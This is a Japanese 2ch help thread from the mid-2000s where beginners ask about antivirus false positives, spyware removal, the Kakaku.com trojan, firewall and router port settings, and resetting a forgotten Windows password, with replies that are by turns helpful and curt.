こんなのがあるんですか…。
よくわからんのですが、このタイプのものは
正体を表す(というのか？)前の状態のファイルをスキャンしても
ウィルスを検知できないんでしょうか？
ネットって怖ぇ…。

トレンドマイクロのオンラインスキャンって、無料でできるようですけど
ウィルスを発見できる精度みたいなものは無料とはいえしっかりしているのですか？

ウイルス警告で

Unix.Penguin
が検出された表示されました・・これってどうすればいいんですか？
どんな被害があるんでしょうか。教えてください！

>>284
かなりしっかりしてるが、最新のウイルスには対応してないこともある。
>>285
2chのスレなら誤検出かと。

>>285
ありがとうございました。
なぜか2chを見ているときだけ出てくるんですよ・・

シマンテックのオンラインスキャンを今日始めてやってみた所、
８つほど見つかりました
C:\Documents and Settings\ユーザ名\My Documents\Jane2ch.exe\Logs\2ch\ＰＣ等\PCサロン\1113028828.dat は　VBS.Internal に感染しています。
C:\Documents and Settings\ユーザ名\My Documents\Jane2ch.exe\Logs\2ch\案内\ラウンジ\1116135965.dat は　VBS.LoveLetter.Var に感染しています。
C:\Documents and Settings\ユーザ名\My Documents\Jane2ch.exe\Logs\2ch\案内\PC初心者\1033948204.dat は　VBS.Network.E に感染しています。
C:\Documents and Settings\ユーザ名\My Documents\Jane2ch.exe\Logs\2ch\実況ch\番組ch(フジ)\subject.txt は　Unix.Penguin に感染しています。
C:\Documents and Settings\ユーザ名\My Documents\Jane2ch.exe\Logs\2ch\ネット関係\宣伝掲示板\subject.txt は　Bloodhound.Exploit.6 に感染しています。
C:\Documents and Settings\ユーザ名\My Documents\Jane2ch.exe\Logs\2ch\ネット関係\セキュリティ\1114223469.dat は　VBS.LoveLetter.A に感染しています。
C:\Documents and Settings\ユーザ名\My Documents\Jane2ch.exe\Logs\2ch\ネット関係\セキュリティ\1114249250.dat は　VBS.LoveLetter.A に感染しています。
C:\Documents and Settings\ユーザ名\My Documents\Jane2ch.exe\Logs\2ch\ネット関係\セキュリティ\1116173150.dat は　MHTMLRedir.Exploit に感染しています。
これはいわゆるノートンが過敏すぎるが故の誤検出でしょうか？
インストしてるマカフィーでウイルススキャンしても何もヒットしません。

yes ノートントラップ

すみません教えて下さい。XPのSP2で光使ってます。

今電源切ろうとしたら電源Offのアイコンが無く
ほかの人があなたのコンピュウターにログインしていますって
でたんですが家族で自分しかパソコンは使いません。

再起動したら直ったんですがまたほかの誰かが自分のパソコン
覗いてると思うと・・

どうすればいいのですか教えて下さいお願いします。

>>290
面倒でも再セットアップして、ファイアウォールでインバウンド（受信側）を総て閉じろ。
できればルータも買ってry
ここで初めてネット接続しWin update (Office update )、今まで使用してきたパスワード等
は総て変更。

>>291さん

どもです。仕事柄パソ２台常時使用しているのでルーターは使ってます。
今ウイルスバスターのオンラインスキャンしてみましたが異常なかったです。
シマンテックはなぜかスキャンできなかったですけど・・。

もう少し様子みてみます。

NATってセキュリティ対策的にどんだけ効果あんの？

>>292
ご参考までに

答えてねっと：他のユーザーがログインと出て・・・
ttp://www.kotaete-net.net/bbs04001.aspx?intOriginalQuestYear=2003&intOriginalQuestID=93345&intPageNo=0&DlgMode=1

unpak32というプロセスを使うウイルスについての情報ありませんか？
トロイの木馬型のウイルスなのですが、検索しても情報が少なくてよくわかりません。

ルーター買ってきました
ウイルスバスター入れてあるのですがこのＦＷはどうしたらいいのでしょうか

今まで通り使えば？

>>296
そのまま使って問題ない

ファイアウォールはワームの侵入を防いでくれるのでしょうか？
例えば最近の事件だと価格の件みたいにアクセスするだけで感染するタイプです
ファイアウォールじゃなくavast!のような常駐機能があるアンチウイルスソフトじゃないと防げないのでしょうか？(価格のウイルスはavast!に対応してないので防いでくれませんが

ホームページ閲覧で〜　　ってのはウイルスやスパイウェア
これはOS自体のセキュリティアップデートやアンチウイルスで対応する

ワームはこちらがアクセスせずとも
「ネットに繋がっている状態」なら向こうから飛んでくるもの
OS等の穴がある状態で開けてるポートから入ってくるから
ファイアウォールでポート閉じとけば防げる

詳しい説明ありがとうございます
ワームはファイアウォールで全てのポートを塞いでしまえばほぼ大丈夫ということですね

>>272
隠しファイルを含めたファイル検索をやったら一発で見つかりました。
直ちに削除し、再度トレンドオンラインスキャンを実行。
今度は何も検出されませんでした。一先ず安心でしょうか。

アドバイスありがとう！

Spybot - Search && Destroy ver1.3を使うと、

チェック中にエラー発生！: Xuron55 (Datei C:\WINDOWS\win.ini kann nicht
ge_ffnet werden. ファイルが別の処理で使われているため、アクセスできません。)

という表示が出ます。どうやらスパイウェアのようなんですが、safeモードでも駆除
出来ません。駆除方法を教えて下さい。
OSはWIN98SEです。
Spybotの専用スレがあることは承知していますが、初心者には敷居が高いので、
こちらで質問させてもらいました。
ご教授の程、よろしくお願いします。

>>303
確かに専用スレはあるけど、残念ながら正常に機能してないのよね（笑）

という訳で、公式のサポートフォーラムを見た方が早いでしょう
それらしい情報があるのはこのスレッドかな？

ttp://forums.net-integration.net/index.php?showtopic=29989&hl=xuron55

要は、スパイウェア云々じゃなくてSpybot本体のエラーらしい
ちゃんとSpybotをアップデートしているか、ということなんですが
（特に"advcheck.dll"のプロパティが2004年10月4日になってるとマズいそうだ）

「2004年10月4日より前になってるとマズいそうだ」だった、訂正

まあとにかく、アップデートで出てくる項目を全部チェックしてアップデートをやり直してみなはれ

突然で申し訳ありません。
自己管理の不備でwin2000のデスク型のＰＣのpassが解けなくなりました。
ＦＤを使用せずに解く事ができないのでしょうか？
そういうシステム（？）をお持ちの方
良ければ圧縮した状態でmailして貰えないでしょうか？
お願いします

>>306
まずはぐぐれ。
ttp://homepage2.nifty.com/winfaq/howtoresetpassword.html#ntpass

http://mobilers-club.com/service.html
このようなモバイル向けデータ圧縮プロクシサービスがあります。
ここは完全に個人で運営しているようなのですが、このサービスを使うと、
sslなどで暗号化した通信の中身を運営者に解読されることはありえますか？

Air-EDGE関連の掲示板で話題になっているのですが、誰も答えが
出せないので、この板の方にご教授願いたいのです。
よろしくお願いします。

>>307
すいません
どれもやってみたのですが・・・無理でした・・・
後１つのＨＰはnotfoundになっていました。

>>308
SSLの性質上絶対に解読されないとは言い切れないけど、そこのサービスを
使わなくても、ネットではいろんなサーバを経由してるわけだから、特にそこを
危険視する必要も無いと思う。
それより平文で送る通信（２ちゃんへのカキコとかｗ）の方が危ないかも・・・。

ですが・・・どうしても解けないので困ってます

ありがとうございます。
通常の回線と同じく確率的にしか破られる
ことはないということですね。
これで不毛な議論は解決しそうです。

何か良い手はないのでしょうか？ＦＤとCDも使えず・・・

>>309>>311
>別フォルダの Windows から Administrator パスワードをリセット
もできなかった？

>>314
はいできませんでした

>>315
どれかの管理者権限にログオン出来なきゃ無理だから
諦めて再インストールしろ

わかりました

>>306>>313
Windows OS向けリソースキット・ツールを入手する
http://www.atmarkit.co.jp/fwin2k/win2ktips/379reskittool/reskittool.html
を手に入れてからWinFAQno「別フォルダの Windows から Administrator パスワードをリセット」をやる。
あと名前欄に306とか入れてくれ。誰だか分からん。

スキルがないなら、専門業者にやってもらえ。

>>306
つーか、板違いだよね。http://pc8.2ch.net/win/

>>318
すいません入れるようにしておきます
（業者に依頼する事にしました。）
>>319
すいませんでした

>>318
すいません入れるようにしておきます
（業者に依頼する事にしました。）
>>319
すいませんでした

>>318
すいません入れるようにしておきます
（業者に依頼する事にしました。）
>>319
すいませんでした

>>322
つかさ、考えりゃ分かると思うんだけど、素人がちょっといじって簡単に破れるようじゃ、
パスワードでロックする意味が無いのではw

そもそも、簡単な方法があったとしても、誰も答えないと思うよ。
だって、その方法を悪用したらどうなる？

>>304
教えて頂いた通りやってみたところ、解決しました。
有難うございました！
アップデートはしてたのですが、自動的にチェックがつくものしか
落としていませんでした。
検索していくつか出てきたデータのうち、「Advanced detection library」
というものをダウンロードしたところ、解決しました。

>>320
guestアカウントを残してないのか？

自分でウイルスを作れる人にピンポイントで狙われた場合、対策方法はあるでしょうか。

セキュリティソフトは入れていますが、ソフトメーカーがアップデートで対応するのは、そのソフトメーカーに情報が入ったウイルスだけですよね？
例えば、私に恨みのある人物が私用にウイルスを開発して、ブラウザやメールを介して感染させてきた場合、そのウイルスの発見は可能でしょうか。

マカーで２ちゃんをしていたら突然マカー全体が点滅し始めました。
マカーを終了させると今度はデスクトップのアイコンがウェーブ
のように点滅をくりかえし始めました。
何かのウイルスに感染したのでしょうか？
ノートンは異常なしと言っています。
お願いします。

>>326
先月中盤から現在もなお、ロリコン野郎を狙い撃ちした山田ウィルス。
続々と増えるこの亜種にどれだけの対策ソフトが役にたっているのか調べれば一発でわかるよ

オンラインウィルススキャンで
ウイルス除去してくれる奴ありますか？

>>326
ウイルスの検出は、シグネチャ方式（定義ファイル利用）と
ヒューリスティック方式にて実施します。
たとえば、Eset社のヒューリスティックエンジンは、WildCore
ウイルスの88.1％を定義ファイルなしに検出します。

このへんのやつはどうなんじゃろ
http://pc8.2ch.net/test/read.cgi/pcqa/1115237587/3

Spybotで検出されたDSO Exploitというスパイウェアが削除してもまたすぐ検出されるんですが
完全に削除するにはどうしたらいいんでしょうか？
あとこれはどんな危害をもたらすスパイウェアなんですか？

>>326
.exeファイルで悪意のあるものを実行させられた場合は、
どんなソフトでも阻止するのは不可能です
ソフトでレジストリ内部の変更をロックするなどの方法を取るしかありません
それ以前に得体の知れない.exeファイルを実行する方がバカです

>>332
今の定義ファイルでは検出しないようになっています

>>332
Spybotのバグ、ほっとけ。
スキャンする前にアップデートしてれば検出されないはず。
ttp://www.higaitaisaku.com/dso.html

なぜそのソフトのスレを見ないんだろう…
初心者が引っかかるような事は、大抵テンプレに書いてあるのに。

326以降の質問が、同一人物による釣りに思えるのは私だけだろうかw

２５０〜２６０くらいで登場したものです。
シマンテックに問い合わせてみたところ、やはりウイルスソフトのプログラム上での認識が遅れてエラー
表示されるみたいです。でも、これからも何度かエラー表示されると思うから気持ち的に
不安です。みなさんは、たまにエラー表示される事ありますか？

先週買ったＰＣにマカフィーＶＳが９０日間無料でついていたのですが,
９０日たったら更新するのにいくらお金かかるのでしょうか？

>>338
公式逝け　このケツメド野郎

マカフィーのＨＰみたのですがどこに書いてあるかわからなくて。。。。

>>340
はぁ？何寝言いってんだ？
McFee
で検索すれば一発で出てくるだろ
寝言は寝てから言え

>>340
ここを>>1から嫁。
http://pc8.2ch.net/test/read.cgi/sec/1114954465/

http://www.mcafeestore.jp/mcfs/goods/detail.asp?goods=0000010000009&category=00001425&shop=8g
これな
ちったは真面目に検索しろや　このケツメド野郎

うう。。　ありがとうございます。

スペル違うんじゃねぇか？と思ったら、「McFee」でぐぐると一番上が正解だったw
なんかすげえw

XPsp2+火狐+ウィルスバスターなんだが
価格ｺﾑの件で、不安が増量中な俺。

セキュリティ向上のため、フリーウェア入れたいんだが
おすすめのやつ教えてｴﾛｲ人

NOD32は入れてみたが
競合？みたいなのでｱﾝｲﾝｽｺしたから
それ以外で頼むm(_ _)m

>>345
以前、同じような質問があって、なぜかそっちの方が早いこと知った　　(´ー｀)y─┛~~

Spybot Search&Destroy
Ad-awareSE
SpywareBlaster
ie-spyad

この４つは競合しないので、入れておくといい
どれもスパイウェア対策の基本ソフト

>>294さん

遅れてすみません。ありがとうございます。

ウイルスバスター使ってるんですかけど、価格コムのウイルスを検出するには
専用の駆除ツールをダウンロードしなければ駄目ですか？
ただ単にアップデートすれば検出してくれるのでしょうか？

>>348
ｱﾘｶﾞ�d
関連スレ見てきたが俺には
Ad-awareSEが使い安そう

>>350
勝手にせい
どっちだろうと構わん

>>351
競合しないから４つともいれとけ
害は何もないから

W2KでブラウザはFireFoxでウイルスチェックにNOD　ADSL回線でプロバイダはASAHI-NET　ADSLモデムはSV3
ポート80(www)公開したいんですけど設定が飲み込めません。
パケットフィルタ設定を弄らなきゃいけないとあるのですが、以下のように設定しましたが、
自分のプロバから振られてるIPを打ち込んでも認証画面が出てはねられます。
パケットフィルタ設定
優先順位　58／適用インタフェース　メインセッションに送信
送信元IPアドレス／マスク長　0.0.0.0/0／宛先IPアドレス／マスク長 0.0.0.0/0
プロトコル　TCP／送信元ポート番号　80／宛先ポート番号　80
フィルタ動作　通す


優先順位　57／適用インタフェース　メインセッションに送信
送信元IPアドレス／マスク長　0.0.0.0/0／宛先IPアドレス／マスク長 0.0.0.0/0
プロトコル　TCP-SYN ／送信元ポート番号　1-79／宛先ポート番号　1-79
フィルタ動作　通さない

優先順位　59／適用インタフェース　メインセッションに送信
送信元IPアドレス／マスク長　0.0.0.0/0／宛先IPアドレス／マスク長 0.0.0.0/0
プロトコル　TCP-SYN ／送信元ポート番号　81-65535／宛先ポート番号　81-65535
フィルタ動作　通さない

優先順位60のTCP-SYNのポートを全て通さない設定は切ってあります
また、アドレス変換（ポート指定）設定で、webーバを外部に公開するにチェックを入れ
自分のLAN側IPを入力しました。

なおhttpdはsHTTPDです。
認証画面には「URLの"config"に対するユーザー名とパスワードを入力してください」と出ます

>>354
あなた、面白い設定してるね。
プロトコル　TCP／送信元ポート番号　80／宛先ポート番号　80
ためしにttp://www.cybersyndrome.net/evc.htmlやってみ。
REMOTE_PORTが80かい？
上記の結果からもう一度「通す」「通さない」の送信元ポートの設定を考えてみよう。

と、いうと
プロトコル　TCP／送信元ポート番号　4828／宛先ポート番号　4828
なのか
プロトコル　TCP／送信元ポート番号　4828／宛先ポート番号　80
なのか
プロトコル　TCP／送信元ポート番号　80／宛先ポート番号　4828
というか全滅でしたが

>>357
もう一度ttp://www.cybersyndrome.net/evc.htmlしてみ。
今回もREMOTE_PORT 4828になったかい？ついでにF5してみ。
あと、なんのために「優先順位」ってあるのかも考えよう。
多少苦労して覚えたほうが良いこともあるはず。

プロトコル　TCP／送信元ポート番号　*／宛先ポート番号　80
これでもダメでした

優先順位も、通さない設定しているヤツより上にしてあります。
通さない設定を削除しても状態は変わりません

まさかルーターのポート設定がまだという落ちはないよね？
web鯖をするような人がルーターなしとは思えんし、
設定しわすれということは９９％ないと思うが。。。

アドレス変換（ポート指定）設定で、webサーバを外部に公開するにチェックを入れ
自分のLAN側IPを入力しました。

上のことではないのでしょうか？

>>331
どうもありがとう

>>360
昔はルーターなし、ファイアウォールなしで運用してたので
さっぱりその辺のセキュリティがわからないのです
まだあまり踏み台がどうこうやウイルスがどうこうという話が一般的ではなかったころで

ベリサインとかPマークとかがサイトにあるととりあえずクリックしてみるのですが、
@niftyのサイトにある「安全・安心マーク」の挙動がおかしい気がします。
ttp://www.nifty.com/policy/privacy.htm?top9

マークを管理している協会のJAVA SCRIPTを有効にする方法のページに飛ばされるんです。
他にも同じようになってしまう方いますか？
ソースコードとかわからないので自分では何がなんだかさっぱりです。

>>363
>プロトコル　TCP／送信元ポート番号　*／宛先ポート番号　80
この設定でポートスキャンしてもopenにならない？

やられました。
LAN内から見えないだけで、WANからは見えましたorz
あとはパケットの廃棄の設定をするだけです･･･とほほ

80をあけましたがその場合送信元ポート番号と宛先ポート番号は何を指定したらいいんでしょうか

>>366
最後のレスにするけど、>>354の設定は80番以外を総て遮断したいという事でしょ？
色々考えるように言ってきたけど、例えばこんな設定したほうが簡単じゃないかな。

優先順位　58／適用インタフェース　メインセッションに送信
送信元IPアドレス／マスク長　0.0.0.0/0／宛先IPアドレス／マスク長 0.0.0.0/0
プロトコル　TCP／送信元ポート番号　*／宛先ポート番号　80
フィルタ動作　通す

優先順位　59／適用インタフェース　メインセッションに送信
送信元IPアドレス／マスク長　0.0.0.0/0／宛先IPアドレス／マスク長 0.0.0.0/0
プロトコル　TCP-SYN ／送信元ポート番号　*／宛先ポート番号　*
フィルタ動作　通さない

これでも80番のみopenにならないかい？
もうやっているだろうけどUDPも対象にしたポートもあるよね。

送信元は0.0.0.0/0で良いと思うが、受信側は…わからん　0.0.0.0/0なら確実かな
漏れは自宅鯖を運営してないからなー。

ここで粘るより自宅サーバスレに移動したほうがいいと思うよ。
http://pc8.2ch.net/mysv/subback.html

いきなりですが質問です。

現在ノートPC（XP・ウイルスバスター2004）をメインに使用しているのですが、デスクトップ（９８・対策なし）を使用している際、「Security iGuard」なるソフトが勝手にインストールされてしまいました。
（これがスパイウェアであること、ウイルスを呼ぶものであることが分かっています）

同じディスクをデスクトップにもインストールして、スキャンしようとしたのですが、このソフトに押さえられたようで起動できません。

よろしくおねがいします。

>>368
状況説明は分かった。
俺の感想は、間抜けな持ち主のせいでWin98機がかわいそうに。
んで、質問は？

>>369
ｽﾏｿ
ネットに繋がない状態でこの「Security iGuard」を駆除したいのですが･･･
どうすればいいでしょうか？

ネットに晒すと二の舞になる可能性が高いので･･･orz

.EXEや.batファイルは、もし仮に定義ファイルが全てのウィルスに対応していたとしても
事前にスキャンして何も問題のものが検知されなかった場合にも
実行したらウィルスだった、ということはあるのでしょうか？

もしそうならこの手のファイルは、
とにかく安全性にちょっとでも疑わしい部分があったら
実行しない、というのが最善の策ですか？

>>370
自分でちっとは調べたのか？
Security iGuardで検索すればすぐわかるぞ

>>372
検索して調べたのですが、アンチソフトをDLしてくれという話がありました。
実際ネットワークに繋ぐとPC完全に温床になってしまいますので、晒さないようにするために
なんとかスタンドアロン状態で駆除したいと考えている次第です。

>>371
ある程度ウィルス対策の出来ている人は、
　疑わしいものは実行しない
　出所不明のものは実行しない
　HTMLメールはこちらからは決して送らない・受け取ってもできるだけ読まない
　見ず知らずの人からのHTMLメールは絶対に読まない
　OutlookExpressは使わない
このくらいはしている。

ウィルスに感染しようがしまいが、疑わしいファイルを実行なんてマヌケのすること以外なんでもない。

>>373
http://www.hde.co.jp/hav/virusdata/detail.php?vid=200504180
SafeModeでこれをやるしかないな

そのまえに出来るならばUSBメモリやLAN接続やFDなんかを使ってAd-Awareを入れてみな

あー　ネットには繋いでトロイをもらったんだからネットには繋げるな
ならば、その感染したPCをネットにつないで
　Spybot Search&Destroy
　Ad-awareSE
　SpywareBlaster
　ie-spyad
この４つ全てを試してみな
上の２つで検出されたものは全て削除で構わないから

>>376
現在、spybotのみ処理しました。
Security iGuard本体を叩くことができました。

順次残りの3つも試してみる所存です。


ありがとうございました。m(_　_)m

system32に勝手に変なショートカットが出来てるんですけど・・・
これは何かに感染してるんでしょうか？
http://www.ayapro.com/up/load/VA234.jpg

>>378
感染してるかもしれないと思っていながら、ウイルススキャンやスパイウェアのスキャンをやらないのは何故ですか？

>>367
がんばってみます
ありがとうございました

ノートン、バスター、マカフィーの中で一番軽いのって
何ですか？
また、一番重いのは何ですか?

>>381 マルチポスト臭

DNSサーバのデータベースって、簡単に汚染されるの？
社内に一つDNSサーバが立ってるんだけど、それが汚染
されたらｶﾞｸﾌﾞﾙ

>>383
御社の鯖の管理体制なんざ知ったこっちゃないので、
このスレじゃなく御社の鯖管理担当者にお聞きください。

自己解決しました。。。

>>379さん、すいません。慌ててました。system32のショートカットに気が付いたのは、
山田ウイルスの事が話題になっててC:\WINDOWS\system32\drivers\etc\hostsにいろいろ追記されるとか
書いてあったので調べてみたら変なショートカットがあって驚いてスキャンする前にレスしてしまいました。
本当にすいません。スキャンしてみたんですけどTrackingCookieが5つ見つかっただけでした。
TrackingCookieなんかでショートカットが出来るんでしょうか？他にもっと危ないのが入ってるように思うんですが。
どうしたら発見出来るんでしょうか？
HijackThisのログです。
http://www.ayapro.com/up/load/VA236.jpg
スキャン結果です。
http://www.ayapro.com/up/load/VA235.jpg

ノートンのLIVEupdateをしようとすると接続してるはずなんですが「インターネットの接続が必要です」って出るんですが、どうしたらいいんでしょうか？
同様にマカフィーにも「インターネットの接続ができましたら〜」って出てしまうんです…

>>387
>>1

>>386
山田は問題無かったの?
山田の事はﾀﾞｳｿﾛｰﾄﾞ板のｦﾁｽﾚに行けばいい　現在54ｽﾚ目

お尋ねの件に関しては、私は判らんです…ｽﾏｿ

>>389さんレスありがとうございます。
山田ウイルスは大丈夫でした。
いろいろググッてなんとか調べてみます。

ノートンインターネットセキュリティ２００４を使用しています。

２ちゃんねるに書き込むときに無効にしないと
ＥＲＲＯＲ！
ＥＲＲＯＲ：referer情報が変です。(ref1)
って出て面倒です。

かと言って、セキュリティ切りっぱなしとか意味ないし
他メーカーに変えるとか、設定で出来るとかあれば教えてください。お願いします。

>>391
【ノートン入れたら２ｃｈに書きこめない】人へ17
http://school4.2ch.net/test/read.cgi/qa/1100089130/l50

【インターネットセキュリティ入れたら2ちゃんに書き込めない場合】
　1.インターネットセキュリティ起動。
　2.真ん中あたりの「プライバシー制御」をクリック。
　3.右下あたりの「拡張」クリック。
　4.左下の「サイトを追加」をクリック。
　5.WWW.を消して「2ch.net」と文字を入れる。
　6.左上デフォルトのすぐ下に「2ch.net」と表示されるのでそれをクリック。
→青い反転文字になる。
　7.右半分の真ん中あたり「表示したサイトについての情報」欄,
「デフォルト設定を使う」のチェックをはずす。
　8.「許可」をクリック。
　9.あとはO.K O.K.

>>391
検索すればすぐにわかるのになぁ…
http://www.google.com/search?hl=ja&q=%EF%BC%A5%EF%BC%B2%EF%BC%B2%EF%BC%AF%EF%BC%B2%EF%BC%9Areferer%E6%83%85%E5%A0%B1%E3%81%8C%E5%A4%89%E3%81%A7%E3%81%99%E3%80%82%28ref1%29&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=

>>392
ありがとうございました。

>>393
すみません、ついここで聞いてしまいました。

すみませんが、ＸＰＨＯＭＥでノートン2003の最新版に更新はしているのですが、シマンテックセキュリティーチェックで、どうしてもステルスになりません。
なにか特別な設定は必要ですか？
また、おすすめの設定などあれば教えてください

>>395
ルータ使ってるんじゃないの？
だとしたら、ルータの設定がまずい。
質問するときは>>1よく見れ。

YBBで無線ＬＡＮなんですが、ルータを使用してはいないと思うんですが。

>>397
無線LANのアクセスポイントがルータ兼用なんじゃないのか。
つーか、情報小出しにするのなら以後放置な。
型番とかLANの構成とかきちんと書け。

あと、もう一台のＰＣはＬＡＮケーブルで接続し、ＮＯＲＴＯＮ２００３を入れているのですが、そちらは、ＳＨＩＥＬＤＵＰでもすべてのポートがステルスになっています。

情報の小出しするなよ。

はい、次の方どうぞ。

暇なやつばっかりだな。

win98
メモリ256です。
１ヶ月お試し版のウイルス対策ソフトをいれましたが、立ち上げると重くて
マウスさえ動くのが遅くなります。
メモリ不足でしょうか？
簡単なフリーのソフトならサクサク動くのでしょうか？
わたしのｐｃが異常でしょうか？

>はい、次の方どうぞ。

べつに>1なんか
守る必要ねーと思うけど。どうせ暇なんだろ。おまえら。

>>402
異常じゃないけど、Win98時代のPCのスペックじゃきついはず。
常駐を出来るだけ外してやれば動かなくもないが、
Win98はもうサポートも終了してセキュリティパッチも「緊急」のものしか出ないから、
新しいPCの購入を検討した方がいいと思うよ。
当時よりはかなり安くなってるし。

Windows.FAQ - システムリソースって何？どうしたら増やせるの？
http://homepage2.nifty.com/winfaq/sysres.html

暇な>>403が情報小出し君をチャットのように解決してやればいいじゃん。
ただし、みんなの邪魔だから、よそへ行ってやってくれな。

XP なんですがマカフィー、ウイルスバスター、ノートンは同時には使えないんでしょうか？

>>406
やってみて結果報告してください。

ノートン2002を使ってシステムの完全スキャンをするとファイル数が97000個ほど検出されるんですが、
バスターのオンラインスキャンをするとファイル数が50000個ほどしか検出されませんでした。
なぜこんなにファイル数の違いがあるのでしょうか、教えていただけませんか。

>>408
デフォルトでスキャンから除外しているものが違うから。

新しくノートパソコンを買ったら、ノートン先生が入ってました。
でも、以前使っていたバスターより重い気がします。
ノートンとバスターどっちが快適ですか？
ちなみにCPUは1.5GHzメモリは512MBで、XPsp2です。

>>410
＞新しくノートパソコンを買ったら
前のと環境が違うんだろ。比較したかったら体験版を入れてご自分でどうぞ。

Win XP HOME SP1です
svchostが5つもあります
色々調べましたが普通は四つのようなのでウイルスなのではないかと思い質問しにきました
タスクマネージャーのプロセス表示を名前順にソートすると上から
ユーザー名　　　　　　　ﾒﾓﾘ使用量
SYSTEM　　　　　　　　　　1268KB
SYSTEM　　　　　　　　　　7920KB
NETWORK SERVICE　　1176KB
LOCALSERVICE　　　　　524KB
SYSTEM　　　　　　　　　　44KB
となってます
それと定期的にsvchostが外部にアクセスしようとしているようでファイアウォールが反応します
上から二つ目と一番下が怪しいと思うのですがどうすれば正規の物なのかそうでないのか確かめることが出来るでしょうか？

SP1なんか知らねえ

最近山田ノイローゼの人、多いねぇw

>>414
感染してたら笑い事じゃないですからねｗ

またさらに調べたのですがユーザーがSYSTEMやNETWORK,LOCALSERVICEの場合大丈夫そうなのですが
ウイルスはそれも偽装できるものなのでしょうか？

それとsvchostは5つの場合もあるそうですね

山田関連ならこの板じゃなくDownload板の方が情報が多い。
そもそも、ウイルススキャンとかやったのかも疑問だけどな。

>>416
山田に感染するようなことはやってないんですけどね(P2Pや苺の利用

山田ってまだ対応されてないんじゃなかったような・・・

×　山田ってまだ対応されてないんじゃなかったような・・・
○　山田ってまだ対応されてなかったような・・・
です
すみません

板違いかもしれませんが、適切っぽい板が見つからなかったので質問します

ＦＷ内のメールサーバにアクセスする、ＦＷ外へのメールプロクシ（ただの中継ｏｒ転送サーバ）はセキュリティ上のリスクとなりますか？
ちなみにＦＷ内のメールサーバにはＳＳＨでのアクセスは可能です、その場合と比べて大きなリスクが発生しますか？
またメールサーバはＳＭＴＰなりＰＯＰなりＩＭＡＰなりだろうとも認証が必要です（はしょってますが単純な不正中継にはならないっつーことで）

初心者なんですがちょっとお伺いしても宜しいでしょうか？
「ＡＤＳＬに繋いだら、ルーターをかましてＦＷ立てないと危ないよ」
というようなことがどこかのＨＰで書いてたんですが、
ＦＷってwindowsＸＰに標準で入ってますよね。
それではいけないのですか？
ルーターのＦＷと何が違うんですか？

win98seでつ。
件の価格コムがやられたというウィルス（トロイ？）を
簡便にチェックできる方法ないですか？
タダでオンラインスキャンできるとこがいいんですが・・・。

>>418
ノートンもバスターもマカフィーも対応してたはず。
亜種が多いので全てというわけではないようですが。

>>421
価格.comのウイルスはTROJ_DELF.RMですね。
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=11359
ここに駆除ツールがあります。

>>422
ありがとうございます。

http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=11359
>■Windows 95/98/MEを使用している場合
>不正プログラムは、Windows 95, 98, ME上では以下のファイルを自身のコピーと置き換え、
>オリジナルファイルをルートディレクトリ（通常 Cドライブ）に移動しますが、
>本駆除ツールではこれらのファイルの復旧は行いません。
>駆除ツール実行後に、これらのファイルを手動で元に戻してください。
>この作業を行わなかった場合、Windowsの再起動時などにTROJ_DELF.RMに再感染する恐れがあります。
>Windows 2000/XP上ではこの作業は必要ありません。

>・「RUNDLL32.EXE」の復旧（Cドライブの場合）

トレンドさんよ　この説明は変じゃないか？

RUNDLL32.EXEがWindowsフォルダに存在しないんだから、
ウィンドウズは起動しないだろうし、ウィンドウズ上ではファイル操作が出来ないんじゃないのか？
Meは起動ディスクでの操作が必要だろうし、98はDOSモードで起動する必要がある。

この操作をするために、このウィルスはWininit.ini ファイルを使ってファイルの置き換えをしているんだぞ。

ああ、これやっぱり考えてみたらツールでRUNDLL32.EXEの削除は出来ないんだよ
だから、ウィンドウズを終了させたら再起動させてはいけない
DOSでの作業だな！

Symantec AntiVirus7.6から9.0を上書きインストールしたのですが、
ログイン時に「リアルタイム保護をロードできません」というメッセージが表示されるようになってしまいました。
タスクトレイのアイコン表示は正常に動作している時のものなのですが、やはり不安です。
色々ぐぐってみたのですが、デュアルブート構成ではありませんし、
Symeventファイルを更新しても結果は同じでした。
どこに原因があるのでしょうか。ご教授御願い致します。

OS：WindowsXP SP2
機種：Thinkpad X31

この説明は9xだとやっぱり変だわ
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
こんなキー追加したって9xでは実行されないし、マカフィーの説明見たらRunに追加されるらしいから、
こっちが正解だな
あと、ウィルスのExplorer.exeが実行されているから
セーフモードで起動するか、Explorer.exeを終了させる必要がある
じゃないときっと、Rundll32.exeが使用中になっていてsystemフォルダ内に上書きできないはず

素人質問なんですが、初めてのセキュリティソフトの導入を考えています。
同じ商品でも通常版と特別優待版がありその違いがわからないんですが
これって何なんですか？

>じゃないときっと、Rundll32.exeが使用中になっていてWindowsフォルダ内に上書きできないはず

>>428
>これって何なんですか？
通常版と特別優待版

すみません質問です。

・こういった掲示板に書き込みしている人＝Ａさん

・ストーカーのような人＝Ｂさん

Ｑ1．Ｂさんは何らかの方法でＡさんのＰＣ内のフォルダやファイルを
　　　閲覧するこそは可能ですか?

Ｑ2．またその方法は？

詳しい方、どうか教えてください。
宜しく御願いします。

自己解決しました。スレ汚しすいませんでした

すいません、セキュリティに関して質問です。
OS：WinXPSP2　CPU：Cel1.2G　メモリ：256MB
ルータ：NTT Web Caster V110※ポート設定で全てステルスの状態　セキュソフト：マカフィー
上の状況でネットしてるんですけど、ネット接続中マカで頻繁に侵入が検知されます。
ZA、Kerioを使ってた時は侵入が検知される事はありませんでした。
これはルーターを破って侵入してきてるのでしょうか、それとも問題ない通信をマカが知らせてるだけでしょうか？

>>432
誰？全然解決してないんですけど

スレ違いなら、すみません。


でも教えてください、御願いします。

×→Ｑ2．またその方法は？
○→Ｑ2．もし可能ならＡさんが回避する方法は？

で御願いします。教えてください。

>>434
ttp://tmp5.2ch.net/test/read.cgi/download/1116573055/l50
今話題の物ならココが適切
↑見てればQ1もQ2も…

>>435
どうもありがとうございます。

ノートンをいれてるんですけど、
ネットやってると、「…が接続しようとしています。」
という警告がでます。これは攻撃でしょうか？

>>437
「…が接続しようとしています。」
これを略さず全部書け

モジュールが複数以上の認識されない…を利用して接続しようとしています。
とでるんです。いつも「一回遮断」を選んでます。
すいません。よく覚えてません。でたときにまたきます。

>>433
開けているポートで検出するのなら進入検知システム(IDS)だろう

>>437
「バカ…が接続しようとしています。」
おまえもな！

>>437
ああ　ルータで開けているポートに
要求していないごみパケットが飛んできているだけだろう

>>440
FWの設定を確認した所、該当ポートは開く設定にはしてませんでした。
